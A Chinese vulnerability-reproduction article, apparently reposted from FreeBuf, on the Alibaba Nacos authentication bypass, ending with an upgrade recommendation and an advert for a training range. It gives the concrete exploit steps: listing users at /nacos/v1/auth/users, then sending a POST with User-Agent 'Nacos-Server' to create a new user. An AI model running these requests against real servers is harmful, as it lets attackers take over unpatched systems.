Alibaba Nacos权限认证绕过漏洞复现
2021-02-20 12:12:06 Author: www.freebuf.com(查看原文) 阅读量:129 收藏

Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。

Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的认证绕过漏洞。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。

Nacos <= 2.0.0-ALPHA.1

1、在Nacos的GitHub项目地址下载nacos2.0.0-ALPHA.1版本的,下载地址:

wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1

1613790612_60307d9407294b8d380d5.png!small

2.解压下载的安装,进入bin目录运行启动 //启动需要java8环境

tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz

cd nacos/bin

./startup.sh -m standalone

1613790619_60307d9b892dbfec37619.png!small

3、在浏览访问http://your-ip:8488/nacos,搭建成功 //默认账号密码为:nacos/nacos

1613790623_60307d9f80efa9269f0ea.png!small

1、在url处添加访问一下网址即可查看到用户列表

/nacos/v1/auth/users?pageNo=1&pageSize=100

1613790627_60307da3de496b2d2ca0a.png!small

2、访问以下链接并使用burp抓包,然后把get请求改为post,把修改User-Agent头改为Nacos-Server

http://your-ip:8848/nacos/v1/auth/users

1613790631_60307da78725fc3c4c0fd.png!small

3、构造数据包添加一个demo用户,然后发送POST请求,返回为200,表示创建用户成功

username=demo&password=demo

1613790635_60307daba44188690e625.png!small

4、回到登录界面,使用添加的账号密码进行登录,可以看到登录成功

1613790639_60307dafa6c928989671b.png!small

1、官方已发布安全版本,建议下载或升级至最新版本

在这里,给大家介绍一下“东塔攻防世界靶场”

2020年12月,东塔攻防世界靶场正式对外提供注册,各位小伙伴可通过注册后进行体验。新注册用户可获得一定的积分,对于靶场使用获取正确的Key后,也可以获取一定的经验值,经验值根据排名会不定期给予一定的奖励。

并且,在操作过程中,针对出现的Bug和安全漏洞问题可以和塔塔子提出,审核通过后可以获得相应的奖励积分。

东塔攻防世界网站不定时推出可免费限时使用的靶场,具体可关注东塔网络安全学院推出的一系列活动或添加东塔客服了解详情。

东塔攻防世界靶场主要分为在线靶场和职业体系两大特色板块。且平台内的靶场会定期更新内容,尤其是最新漏洞复现的一些文章和靶场,会优先在靶场中提供环境让大家体验。

东塔攻防世界网站会不定期限时免费推出最新的一些复现的靶场,以供学习交流,给了大家充分体验和使用靶场的机会。

具体可关注东塔网络安全学院推出的一系列活动或添加东塔客服wx(dongtakefu)了解详情。

除了以上介绍的内容,还有更多宝藏区域,更强大的功能,等你来寻宝!

详戳下方“东塔攻防世界靶场”网址,Get一波新世界

https://labs.do-ta.com


文章来源: https://www.freebuf.com/vuls/263845.html
如有侵权请联系:admin#unsafe.sh